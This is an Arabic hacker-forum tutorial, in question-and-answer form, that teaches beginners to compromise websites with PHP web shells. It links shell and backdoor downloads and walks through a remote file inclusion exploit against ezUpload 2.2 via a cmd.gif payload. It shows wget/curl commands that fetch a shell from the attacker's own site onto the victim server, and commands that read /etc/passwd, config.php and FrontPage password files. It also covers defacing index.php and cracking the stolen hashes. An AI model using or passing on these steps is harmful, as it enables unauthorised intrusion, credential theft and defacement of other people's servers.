والشرح لمن يريد ==> wget دالتنا التي سوف نسحب بها الملف...
والموقع الذي بجنبها رفعنا عليه
الشل مضغوط علشان نسحبه للموقع المخترق وعند كتابة الأمـر لن يظهر لك أي رد
والآن ... نحن رفعناه مضغوط فيجب فك ضغطه بالأمر unzip shell.zip والرد سوف يظهر في الصورة:
كما تلاحظون الرد المحاط بالأحمر يدل على نجاح العملية والآن ماذا لو لم تعمل هذه الدالة؟؟ أقولك ولا يهمك في دوال غيرها مثلا دالة curl
أيضا إذا أردت التحقق من أن الدالة تعمل ... ما عليك إلا كتابة which curl ... وإليكم شرح بعض دوال السحب
ولنفترض أن الملف الذي نريد سحبه هو worm.zip
نبدأ بالأداة lynx وطريقة سحب الملف كما يلي:::
lynx -source
www.site.com/worm.zip > worm.zip
والأداة curl استخدامها كالتالي :::
curl -o worm.zip
www.site.com/worm.zip
وأخيراً الدالة get استخدامها كالتالي
GET
www.site.com/worm.zip > worm.zip
وكما شرحنا سابقا site.com هو الموقع الذي رفعنا
الشل مضغوط ...
والآن نكمل شرح
الشل الروسي ... لنفترض انك عندك ملف وتبي ترفعه للسيرفر ... والملف على جهازك وش تسوي؟؟؟
أقولك ولا يهمك ... إنزل بالشل للأسفل وشوف الاختيار هذا بالصورة:
1- هنا لاختيار الملف من جهازك ومعناه استعراض Browse
2- هذا الاختيار معناه رفع ... اي عند الانتهاء من اختيار الملف من جهازك اضغط عليه والآن شرح خفيف عن المسار الذي نحن فيه؟؟
/mounted-storage/home10/sub001/sc15759-CYAT/adult-city.ws/html
كما تلاحظون المسار الذي نحن فيه نحن لسنا على المجلد الرئيسي
وأكيد راح تقولي ... شلون عرفت؟؟؟ وأنا أقولك المجلد الرئيسي إما إنه يكون
public_html
أو يكون على اسم الموقع كما في مسارنا
أو يكون www
وإلي أخره ... حسب السيرفر ... والحين عرفتوا احنا ليش مو على المجلد الرئيسي
ولكن أكيد راح تقولي أريد أن أكون على المجلد الرئيسي !!! وأنا أقول إنت تأمر...
نفذ أمر الانتقال من المجلد html ... كالتالي:::
cd /mounted-storage/home10/sub001/sc15759-CYAT/adult-city.ws/
مثل ما شفتوا انتقلنا من المجلد html عن طريق الأمر cd وهو يستخدم للدخول إلى مجلد معين وتغيير المسار....
------ ووووووووو ------
وهــذا شرح آخر للـ
Shell ( نظري )...
طريقة الشرح عبارة عن سؤال , وجواب ...
لكى تصل المعلومة للمبتدء ولو بشكل بسيط
والموضوع هو عن
الشل وأوامره واستخداماته ... إلخ
------------
بسم الله الرحمن الرحيم
------------
ماهو phpshell ؟
عباره عن سكربت مكتوب بلغة الـphp ويستخدم بالكثير من عمليات الهاكرز
وهو أساسي لكل مبتدء للسيطرة علي السيرفر بشكل كبير
------------
طيب اذكر لنا بعض
الأوامر المهمة ؟
ماطلب حاجه ... هناك أوامر كثيرة ومنها ...
Ls
يستخدم لعرض الملفات الموجوده علي الموقع
Pwd
يستخدم لمعرفة مكان تواجدك بالسيرفر او بالموقع
id
يستخدم لمعرفة الصلاحيات التى تملكها
Wget
يستخدم لسحب ملف الي السيرفر ( رفع ملف : Upload File )
وهناك الكثير من
الأوامر ....
------------
الله يعطيك العافيه طيب الحين أنا تعلمت معني
الشل وبعض أوامره. طيب بسألك : له أنواع ولا لأ ؟
اى نعم له أنواع كثيره
------------
طيب ممكن تذكر لي كم مثال اذا ماعليك كلافه ؟
ان شاء الله طال عمرك بذكر لك كم نوع
Myshell
شل رائع جدا وسهل بنفس الوقت ويسمح لك بالتعديل علي الملفات
وتستطيع تعديل الاندكس Index بواسطة الامر
Edit index.php
( بشكل مختصر )
التحميل ...
http://www.i-saudi.com/lezr.com/MyShell-1.0.6.zip
------------
R57shell 1.22
شل روسي به العديد من المميزات
ومنها رفع ملف من جهازك الي الموقع مباشره
دون استخدام اى امر من اوامر لينكس
والاتصال بالباكدور سوا بلغة البيرل او السي
واظهار معلومات عن السيرفر من اصدار كيرنل ونوع ... إلخ
( بشكل مختصر )
التحميل ...
http://www.shellteam.net/clever.txt?
------------
R57shell 1.23
ايضا شل روسي
وبه الكثير من المميزات الغير موجوده
بالشل السابق ومنها الاتصال بقاعده البيانات
واخذ نسخه من قاعده البيانات وايضا يوفر
الشل باكدور ولكنه غير فعال لتوفر جدار الحمايه
والكثير .. إلخ
( بشكل مختصر )
التحميل ...
http://www.me3ady.com/up/up/r57.23.zip
------------
' ويوجد العديد من الانواع '
------------
الحمدلله ؛ لحد الآن فاهم معاك : طيب ممكن اعرف كيف ارفع
الشل علي موقع او منتدى ؟
هناك ثغرات عديده تسمح لك بتطبيق اوامر اللينكس وتستطيع رفع شل او باكدور علي الموقع
------------
رائع طيب اذكر لي ثغره ؟
من عيوني توجد ثغره تسمح لك بتطبيق اوامر اللينكس
وراح اشرحها لخاطرك
الثغره في السكربت ezUpload
وبالتحديد بالاصدار 2.2
------------
الله يعطيك العافيه وفهمت من كلامك انى ابحث بقوقل كذا ezUpload 2.2 ؟
نعم تبحث بقوقل مثل ماذكرت كذا ezUpload 2.2
------------
طيب وبحثت وحصلت لي موقع كيف استغل الثغره ؟
سؤال حلو وراح اجاوبك عليه اخوى والملفات المصابه من السكربت هي التاليه ..
customize.php
index.php
forum.php
initialize.php
يعني حصلنا موقع مصاب وخلنا نقول هالموقع
http://xxx.com/ezupload
ومثل ماذكرت لك الملفات المصابه هي ...
customize.php
index.php
forum.php
initialize.php
يعني ناخذ اى ملف ونحطه ورا الرابط وخلنا نقول هالملف customize.php
يعني راح يصير الرابط كذا ..
http://xxx.com/ezupload/customize.php
وتبي تقول لي ماصار شيء وش استفد بقول لك لا تستعجل كل شيء بوقته
الحين بقولك ارفع cmd.gif على موقعك المجانى.
------------
طيب بس سؤال واسف علي المقاطعه اذا ممكن ؟
تفضل اسأل اخوى ولا تعودهآ
------------
ان شاء الله حبيت أعرف وش هي يعني cmd.gif مو حلوه أرفعها ولا أدري وش فايدتها ؟
سؤال جيد بقول لك هذى تسمح لك بتطبيق اوامر اللينكس ( سبق شرحها فى الأعلي ) وتفضل حملها
http://www.me3ady.com/up/up/cmd.zip
------------
طيب بس سؤال ثاني لو سمحت . يعني بس تيجي كده cmd.gif ولا فى نوع ثاني؟
ايضا سؤال جيد نعم اخوى ممكن تجىء كذا cmd.gif وايضا ممكن تيجى كذا cmd.txt ..إلخ
------------
طيب تفضل اخوى كمل شرحك اذا ممكن ؟
ان شاء الله طال عمرك صرت صبي عندك لؤؤؤؤل لا امزح معك يالله نكمل
مثل ماقلت لك اخترنا هالملف customize.php
وصار رابط الموقع كذا
http://xxx.com/ezupload/customize.php
الحين بقولك هات رابط الـ cmd.gif بعدما رفتعها على موقعك
الحين عندنا الملفات المصابه وموقع مصاب و cmd.gif
بقول لك الان راح يكون رابط الموقع مع رابط cmd.gif كذا ..
http://xxx.com/ezupload/customize.ph...xx.com/cmd.gif
طيب تبي تقول ماصار شيء بقول لك ضيف بعد الرابط التالي ..
?&cmd=id
يعني راح يكون الرابط كذا
http://xxx.com/ezupload/customize.ph...md.gif?&cmd=id
وراح يطلع لك التالي .. مثلا ..
uid=99(nobody) gid=99(nobody) groups=99(nobody)
------------
طيب اخوى دكتور جرح بس سؤال وش معني اللى ظهر لي ؟
انا شرحت لك ياخوى اول شيء ان هالامر id معناته يظهر صلاحيتك
وصلاحيتك الان nobody
------------
مقاطعه " نكتب الامر التالي عشان نعرف احنا وين بالضبط واللى هو الامر .. "
Pwd
------------
طيب مشكور اخوي تفضل كمل الشرح اذا ماعليك امر ؟
امري لله وبكمل معاك للنهايه واشوف وش تاليها معاك
------------
الحين ظهرت صلاحيتا يالطيب بقول لك اول شيء نكتب الامر التالي ..
which wget
وادري تبي تقول : وش هالامر ؟ بقول لك هالامر يشوف نقدر نسحب ملف علي الموقع ولا لأ
يعني بالعربي اقدر ارفع ملف ولا لأ
يالله نكتبه ونشوف وش يظهر لنا
------------
طيب بس سؤال وين اكتب الامر ؟
اخوى الامر نكتبه بدال id يعني راح نحذفها ونحط محلها which wget
------------
طيب كمل اخوى دكتور جرح ...
ابشر راح اكمل لخاطرك ...
حلو ظهر لنا مثلا .. /usr/bin/wget وادري تبي تلقف
وتقول وش اللى ظهر لنا مافهمت !
بقول لك يعني نقدر نرفع ملف علي الموقع
بالعربي مسموح لنا نرفع
طيب الحين نبي نرفع اى شل من اللى شرحتهم انا
امممم
نقول Myshell احلي والله واعزه كثير
يالله ياخوى خلنا نرفع ونفتك من هالموقع ومنك لؤؤل
الحين بقول لك ارفع
الشل علي موقعك المجانى ( الموقع راح فيها لؤؤل )
------------
مافهمت وضح لي اكثر لو سمحت ؟
طيب انت الان بعد ماحملت
الشل ارفعه علي موقعك المجانى بصيغه zip يعني وين زاب
طيب فهمت عليك
------------
ياريت تكمل طال عمرك ...
ابشر راح اكمل معاك
الحين بقول لك جيب رابط
الشل بعد مارفعته علي موقعك المجانى
وخلنا نرفعه علي الموقع االلى نطبق عليه من اليوم
وادري ياخوي بتقول كيف ارفع والله ؟ ادري
بقول لك انا قلت لك بالبدايه هالامر wget وظيفته الرفع علي الموقع
طيب يالله خلنا نرفع
بس بقول لك صبر قبل لا نرفع خل نشوف لنا ملف تصريحه 777
------------
طيب بس سؤال ليش ملف تصريحه 777 ؟
عشان ياخوى تقدر تستخدم اى امر فيه
من قراءه : Read ، كتابة : Write , رفع : Upload ، تعديل : Edit ... إلخ
------------
طيب فهمت عليك يالله كمل اخوى ..
ان شاء الله بكمل والحين نعرض الملفات مع تصاريحها بالامر ls –l
ظهرت لنا الملفات مع تصاريحها
ونشوف الملف اللى تصريحه 777 ويجيك كذا ..
rwxrwxrwx
طيب ياخوي تبي تقول ماحصلت ملف وش اسوى ؟
بقول لك عط تصريح لاي ملف وان شاء الله مسموح لك
------------
طيب ياخوي ما اعرف كيف اعطي تصريح لملف ممكن تقول لي الطريقه ؟
ان شاء الله اخوى الطريقه كالتالي ..
Chmod 777 filename
------------
طيب اخوى ممكن توضح اكثر لانى مو عارف شيء ؟
ابشر اخوي راح اوضح لك اكثر وبقول لك ..
Chmod = يستخدم هالامر لاعطاء التصريحات للملفات
777 = تصريح رقم 777 وذكرت وش معناته
Filename = اسم الملف اللى نبي نعطيه التصريح رقم 777
------------
طيب فهمت عليك الله يجزاك خير كمل ...
يالله نكمل تبي تقول عطيته تصريح وابي اتآكد انه يملك التصريح 777 بقول لك اعرض الملفات من جديد مع تصاريحها بالامر ls –l
وراح تحصل الملف اللى عطيته التصريح رقم 777 مكتوب بجانبه التالي ...
rwxrwxrwx
تمام يعني الحين نقدر نسوى اى شيء علي هالملف
يالله الان نبي نرفع
الشل ( ماصارت رفع لؤؤل )
ونكتب.. هالامر التالي
wget
www.xxx.com/myshell.zip;ls myshell*
طيب بقول لك وش المتغيرات
Xxx = اسم موقعك المجانى
Myshell.zip = اسم
الشل اللى رفعته علي موقعك
طيب حلو تبي تقول ليش كتبنه ls ؟ بقول لك عشان نتأكد ان
الشل مرفوع
طيب الحين يوم كتبنا الامر ls شفنا الملفات وطلع منهم
الشل اللى رفعناه
بقول لك زين علي زين الحين نفك الضغط عن
الشل وادري تبي تقول لي كيف ؟؟؟
بقول لك من عيوني الحين اعلمك كيف ونكتب الامر التالي ..
Unzip myshell.zip;ls
المتغيرات ...
myshell.zip = اسم
الشل اللى رفعناه علي موقعنا
والامر ls كتبناه عشان نشوف
الشل بعد فك الضغط موجود ولا لأ
طيب طلعت لنا الملفات ومنهم
الشل ... مالنا ...ومكتوب كذا myshell.php
بقول لك حلو وماشاء الله عليك شكلك فاهم المهم الحين نبي نروح للشل مالنا
بقول لك ابشر وماطلبت حاجه
مثلا رفعنا
الشل علي المجلد الرئيسي للموقع راح يكون رابطه كذا
www.xxx.com/myshell.php
طيب رفعناه علي المنتدى راح يكون رابطه كذا
www.xxx.com/forum/myshell
واعتقد القصد وضح لك يعني الملف اللى رفعنا عليه الشل
نحطه بعد رابط الموقع وبعده اسم
الشل اللي فرضنا اسمه هو myshell
واعتقد ذكرت بالبدايه ان نكتب الامر pwd عشان نعرف احنا وين بالضبط
الان الحمدلله
الشل مرفوع وكل شيء تمام
------------
بس يادكتور طلب منى باسورد
الشل مع اليوزر وش اسوى ؟
يالطيب تقدر تغير الباسورد واليوزر علي كيفك لكن انا مخليهم
User = Dr.Jr7
Pass = Dr.Jr7
أو تقريباً الـ Pass يساوي = 123456
------------
طيب تمام عليك قدرت ادخل
الشل وش اسوى ؟
يالطيب راح اذكر لك بعض الاوامر المهمه ..
الامر ...
cat /homepublic_html/_vti_pvt/access.cnf
الثاني يوزر نيم والموقع
------------
الامر ...
ls /var/named
وهو لاستعراض المواقع علي الموجوده علي السيرفر
------------
الامر ...
لاخراج المواقع اللى على السيرفر
cat /etc/httpd/conf/httpd.conf
------------
الأمر ...
cat /homepublic_html/_vti_pvt/access.cnf
أمر معرفة أسامي المواقع التي تستخدم الفرونت بيج
------------
الأمر ...
cat /homeadmin/config.php
cat /homeadmincp/config.php
أمر عرض ملفات الــ config.php للبرامج المثبته على المواقع مثل
المنتديات والمجلات وغيرها من الملفات التي تستخدم الــ config
------------
الامر ...
cat /etc/domainalias
عرض المواقع مع أسامي المستخدمين
------------
الامر ...
find / -name config.php
البحث عن جميع الملفات التي إسمها config.php
وستطيع البحث في هذا الأمر عن أي ملف تريد
------------
الامر ...
cat /etc/passwd
يظهر جميع باسوردات المواقع التي على السيرفر
وإذا كان اللي ظهر لك بالطريقه هذي
carlos:vmYQDR1pWRVLE
معناها ان carlos إسم الموقع
وإن vmYQDR1pWRVLE هو الباسورد المشفر
أما إن طلع لك بالطريقه هذي
carlos:x
فمعنى الــ x ان الباسورد مخفي وما تقدر تشوفه
------------
يعطيك العافيه اخوي دكتور جرح علي الاوامر ... بس هذى الاوامر ؟
العفو اخوى ... وفيه أوامر تانية كتيييييييييييرة جداً ... إن شاء الله هنوضحها
------------
الله يعطيه العافيه طيب الحين عرفت
الشل وعرفت اوامره وعرفت ارفع شل وعرفت ولله الحمد بعد ما ادخل
الشل وش اسوى .
طيب انت قلت تقدر تغير الاندكس index وانت من
الشل وضح لي اكثر ؟
( سأشرح كيفية التحكم , والسيطرة الكاملة علي السيرفر فى الدروس القادمة " إن شاء الله " )
اول شيء الحمدلله انى قدرت افهمك كم شغله بسيطه واما بخصوص الاندكس ... نعم تقدر
وأول شيء تشوف انت وينك بالضبط بالامر pwd ونقول مثلا انت بالمنتدى
بتقول يادكتور برجع للمجلد الرئيسي كيف ؟
بقول اكتب cd .. واضغط انتر بعدها اكتب pwd راح تلاحظ
انك انت بالمجلد الرئيسي طيب تبي تقول حلو
بس الحين وش اسوى ??? بقول لك اكتب ls وراح تظهر الملفات
وراح تلاحظ وجود index.php or index.html
طيب بتقول حلو الحين وش اسوى بقول لك اكتب الامر التالي ..
edit index.php
طيب بتقول وش اسوى الحين ظهر لي السورس مال الصفحه بقول لك امسح السورس
وروح للفرونت بيج واكيد انت مجهز صفحت الاختراق وانسخ الكود وحطه مكان السورس
اللى مسحته قبل شوي . وبعدها اضغط على save and exit . طيب وراح يظهر لنا التالي
Filename: Filename: saved
ويعني حفظ التغيرات
والحين تغيرت الصفحه الرئيسيه
وتقدر تلاحظ انت بنفسك وتشوف تغيرت ولا لا ( تكتب الموقع بحاله وتشوف )
------------
الله يعطيك العافيه والحمدلله قدرت افهم اشياء كثيره طيب الحين الاندكس بس بالمجلد الرئيسي ؟
علي ما اعتقد نعم ( غالبا )
------------
طيب يادكتور نسيت اسالك سؤال ؟
شنو السؤال ... ؟
------------
الحين انا جبت باسوردات المواقع مشفره كيف افك التشفير ؟
بقول لك استخدم برنامج john , أو Rainbow Crack
وبالنسبة لبرنامج John فهو سهل الاستخدام , أمـا برنامج Rainbow Crack فهو صعب نسبياً بالنسبة للمبتدئين ولكنه الأقوي...
, وتوجد مواقع لفك الباسوردات المشفرة من نوع MD5 مثــل :::
milw0rm
بعد ما ندخل عليه نروح الـ cracker
بعدين ندخل علي insert
وراح يطلع لنا مستطيل نحط فيه الباس المشفر ونختار MD5
ونفترض هذا الباسورد المشفر
e10adc3949ba59abbe56e057f20f883e
وبعدها نضغط علي الـ submit
وراح يطلع لك الباسورد بعد فك التشفير
وهو 123456
ونفترض ما طلع بنفس الوقت ... روح أعمل بحث علي الهاشات ( الباسوردات المشفرة ) التي تم فك تشفيرها من خلال ...
خاصية Cracked Hashs إلي أن تجد الهاش الذي وضعته ...
واكتب الباس مشفر ... وموفق يالغالي ( ومش شرط يظهر الباس في نفس الوقت ... ممكن ياخد فترة )
&&&
أو ... روح لموقع passcracking.com وضع الباسورد المشفر MD5 وسيتم فك الباسورد المشفر خلال 24 ساعة إلي 72 ساعة ...
------------
طيب يعطيك العافيه ومثلا قدرت أفك الباسورد المشفر كيف اقدر ادخل ؟
بقول لك تقدر من الإف تي بي ftp او تكتب بعد رابط الموقع ...
www.xxx.com:2082 www.xxx.com/cpanel
* لوحة التحكم ممكن تكون فعلاً علي هذا المسار site.com:2082 أو cpanel ,,, ولكن هذا افتراضياً وفي الغالي بتتغير *
يعنـــــــي ...
( مش لازم يكون 2082 أو cpanel ) فقط تابع الشرح ( " وإن شاء الله " ) وهتعرف إزاي تتحكم فى السيرفر كله
( وسأشرح كيفية الدخول للموقع والسيطرة عليه والدخول إلي لو حة التحكم وووو " فقط تابع الشرح " )
ووووووو
------------
الله يعطيك العافيه ومن جد ماقصرت بس بسألك اقدر اشوف باسورد الموقع اذا كان يدعم الفرونت بيج ؟
بقول لك نعم تقدر وتروح للمسار التالي وانت بالشل
cd / public_html/_vti_pvt
بعدها بقول لك اعرض الملفات بالامر ls
وراح تلاحظ من الملفات الموجوده هالملف service.pwd
بتقول لي كيف اروح له بقول لك لا تروح له أقرأ الملف عادى
وادري بتسأل وتقول كيف اقرأ او شنو امر القراءة بقول لك امر القراءة هو cat
يعني نكتب الامر التالي ...
cat service.pwd
راح تلاحظ الباسود مشفر قدامك " إن شاء الله "
------------
------------
------------
واعتذر ان كان هناك اى خطأء والانسان مو معصوم من الخطأ
وبالاخير أتمنى للمبتدئين كل خير
------------
------------
------------
؛؛؛ وهـــكذا انتهي شرح
الشل ؛؛؛
منقول عن الاخ
جني هكر
**********************************